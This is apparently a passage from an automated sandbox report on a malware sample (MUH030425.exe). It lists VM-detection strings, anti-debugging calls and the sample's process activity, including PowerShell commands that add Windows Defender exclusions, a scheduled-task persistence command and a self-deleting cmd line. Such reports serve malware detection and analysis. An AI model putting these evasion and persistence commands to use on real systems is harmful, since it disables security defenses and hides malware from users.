              Source: Spectrum.exe, 0000001F.00000003.1519475077.00000000005B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: Spectrum.exe, 0000001F.00000003.1523593271.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001F.00000002.2647404908.00000000005C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastruct
              Source: ssh-agent.exe, 00000020.00000002.2646457093.000000000045C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: SensorDataService.exe, 0000001D.00000003.1513698879.0000000000632000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001F.00000003.1523593271.00000000005B4000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001F.00000003.1519475077.00000000005B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
              Source: SensorDataService.exe, 0000001D.00000003.1513698879.0000000000641000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nfNECVMWar VMware SATA CD00NDIS Virtual Net
              Source: Spectrum.exe, 0000001F.00000002.2647404908.000000000059C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus Device
              Source: Spectrum.exe, 0000001F.00000003.1519718828.00000000005D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000r
              Source: RegSvcs.exe, 00000008.00000002.1601150507.0000000001243000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: Spectrum.exe, 0000001F.00000002.2647404908.00000000005C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l,-VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device'{0a56815Nl\
              Source: snmptrap.exe, 0000001E.00000002.2645215189.0000000000523000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
              Source: Spectrum.exe, 0000001F.00000002.2647404908.00000000005C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: Spectrum.exe, 0000001F.00000003.1519475077.00000000005B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
              Source: Spectrum.exe, 0000001F.00000003.1519475077.00000000005B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4NECVMWar VMware SATA CD00
              Source: Spectrum.exe, 0000001F.00000003.1519615034.00000000005C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g\VMware Virtual USB MouseC:\Windows\System32\DDORes.dll,-2212
              Source: SensorDataService.exe, 0000001D.00000003.1514369055.0000000000630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: b2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
              Source: Spectrum.exe, 0000001F.00000003.1519718828.00000000005D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: Spectrum.exe, 0000001F.00000002.2647404908.00000000005C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Spectrum.exe, 0000001F.00000003.1519718828.00000000005D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
              Source: Spectrum.exe, 0000001F.00000003.1519779192.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001F.00000003.1519475077.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001F.00000003.1519615034.00000000005CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure DriverD
              Source: SensorDataService.exe, 0000001D.00000003.1513698879.0000000000641000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .inVMware Virtual disk SCSI Disk Devicet System Management2
              Source: Spectrum.exe, 0000001F.00000003.1523593271.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001F.00000002.2647404908.00000000005C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
              Source: Spectrum.exe, 0000001F.00000003.1519475077.00000000005B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JVMware Virtual disk SCSI Disk Device
              Source: Spectrum.exe, 0000001F.00000003.1519906958.00000000005B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Basic Display Driverkname%;Microsoft Basic Display Driverosoft Hyper-V Gener:#[
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C61361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_02C61361
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00416B94 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetCurrentProcessId,8_2_00416B94
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040B15C LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,8_2_0040B15C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00407A34 mov eax, dword ptr fs:[00000030h]8_2_00407A34
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00465794 mov eax, dword ptr fs:[00000030h]8_2_00465794
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C21130 mov eax, dword ptr fs:[00000030h]8_2_02C21130
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C63F3D mov eax, dword ptr fs:[00000030h]8_2_02C63F3D
              Source: C:\Users\user\Desktop\MUH030425.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Debug
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C61361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_02C61361
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C64C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_02C64C7B
              Source: C:\Users\user\Desktop\MUH030425.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\MUH030425.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe"
              Source: C:\Users\user\Desktop\MUH030425.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wBBaygjR.exe"
              Source: C:\Users\user\Desktop\MUH030425.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe"Jump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wBBaygjR.exe"Jump to behavior
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtOpenKeyEx: Indirect: 0x140077B9B
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtQueryValueKey: Indirect: 0x140077C9F
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtClose: Indirect: 0x140077E81
              Source: C:\Users\user\Desktop\MUH030425.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe"Jump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wBBaygjR.exe"Jump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wBBaygjR" /XML "C:\Users\user\AppData\Local\Temp\tmpD1E0.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "RegSvcs.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C48550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,wsprintfW,8_2_02C48550
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,8_2_00404B4C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeQueries volume information: C:\Users\user\Desktop\MUH030425.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\alg.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeQueries volume information: C:\Users\user\AppData\Roaming\wBBaygjR.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
